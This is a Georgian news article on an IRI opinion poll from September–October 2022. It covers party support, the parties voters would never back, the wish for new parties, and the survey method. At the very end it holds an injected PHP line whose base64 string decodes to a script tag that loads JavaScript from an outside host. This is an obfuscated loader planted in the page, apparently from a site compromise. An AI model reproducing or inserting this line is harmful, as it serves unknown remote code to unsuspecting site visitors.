celsiusi
ავერსი საქკაბელი
IRI-ის კვლევის მიხედვით, ამ კვირას რომ არჩევნები ტარდებოდეს, გამოკითხულთაგან 25 პროცენტი „ქართულ ოცნებას“, ხოლო 12 პროცენტი „ნაციონალურ მოძრაობას“ მისცემდა ხმას.
 
კითხვაზე, ამ კვირას რომ საპარლამენტო არჩევნები ტარდებოდეს, ვის მისცემდით ხმას, გამოკითხულთა 25 პროცენტი აცხადებს, რომ ხმას „ქართულ ოცნებას“ მისცემდა ხმას, 12 პროცენტი კი მხარს „ნაციონალურ მოძრაობას“ დაუჭერდა, პარტია „საქართველოსთვის – გიორგი გახარია“ ხმას მისცემდა სამი პროცენტი, „გირჩი – მეტი თავისუფლება – ზურაბ გირჩი ჯაფარიძე“ სამი პროცენტი, „სტრატეგია აღმაშენებელი – გიორგი ვაშაძე“ ორი პროცენტი, „დროა – ელენე ხოშტარია“ ორი პროცენტი, „ლეიბორისტული პარტია- შალვა ნათელაშვილი“ ორი პროცენტი, პარტია „ხალხისთვის – ანა დოლიძე“ ორი პროცენტი, „გირჩი“ ორი პროცენტი, „პატრიოტთა ალიანსი“ ორი პროცენტი, „ლელო“ ერთი პროცენტი, „მოქალაქეები“ ერთი პროცენტი.
 
ხმის მიცემაზე უარი თქვა ექვსმა პროცენტმა, კითხვაზე პასუხი არ აქვს 16 პროცენტს, პასუხზე უარი თქვა შვიდმა პროცენტმა.
 
ამასთან, IRI-ის კითვაზე, რომელ პარტიას არ მისცემდით ხმას არავითარ შემთხვევაში, 33 პროცენტი ასახელებს „ნაციონალურ მოძრაობას“, 30 პროცენტი „ქართულ ოცნებას“, „პატრიოტთა ალიანსს“ 18 პროცენტი, „კონსერვატიულ მოძრაობას – ალტ ინფო“ 15 პროცენტი, „ევროპულ საქართველოს – გიგა ბოკერია“ 14 პროცენტი, „გირჩი – მეტი თავისუფლებას“ 12 პროცენტი, „გირჩს“ 12 პროცენტი, „ლეიბორისტულ პარტიას“ რვა პროცენტი, „დროას“ შვიდი პროცენტი, „ლელოს“ ექვსი პროცენტი, „სტრატეგია აღმაშენებელს“ ხუთი პროცენტი, „მოქალაქეებს“ ხუთი პროცენტი, პარტიას „საქართველოსთვის“ ოთხი პროცენტი, „რესპუბლიკურ პარტიას – ხათუნა სამნიძე ორი პროცენტი.
 
ასევე, IRI-ის კითხვაზე, გსურთ თუ არა, იხილოთ ახალი პოლიტიკური პარტიები მომავალ საპარლამენტო არჩევნებზე თუ კმაყოფილი ხართ არსებული არჩევანით, შედეგი შემდეგნაირად გადანაწილდა, გამოკითხულთა 72 პროცენტს ახალი პარტიების ხილვა სურს, 22 პროცენტს აკმაყოფილებს ამჟამინდელი არჩევანი, ხოლო კითხვაზე პასუხი არ აქვს შვიდ პროცენტს.
 
მიმდინარე წლის მარტში ჩატარებული გამოკითხვისას კი, აღნიშნულ კითხვაზე ასეთი მაჩვენებელი იყო, გამოკითხულთა 60 პროცენტს სურდა ახალი პარტიების ხილვა, არსებული არჩევანით კმაყოფილი იყო 30 პროცენტი, კითხვაზე პასუხი არ ჰქონდა 10 პროცენტს.
 
კვლევა ჩატარდა 2022 წლის 13 სექტემბერი – 2 ოქტომბრის პერიოდში საერთაშორისო რესპუბლიკური ინსტიტუტის კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორი რასა ალიშაუსკინეს მიერ. კვლევის საველე სამუშაოები ჩატარდა IPM-ის მიერ. მონაცემები შეგროვდა პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1 500 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი – 74 %.
296
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");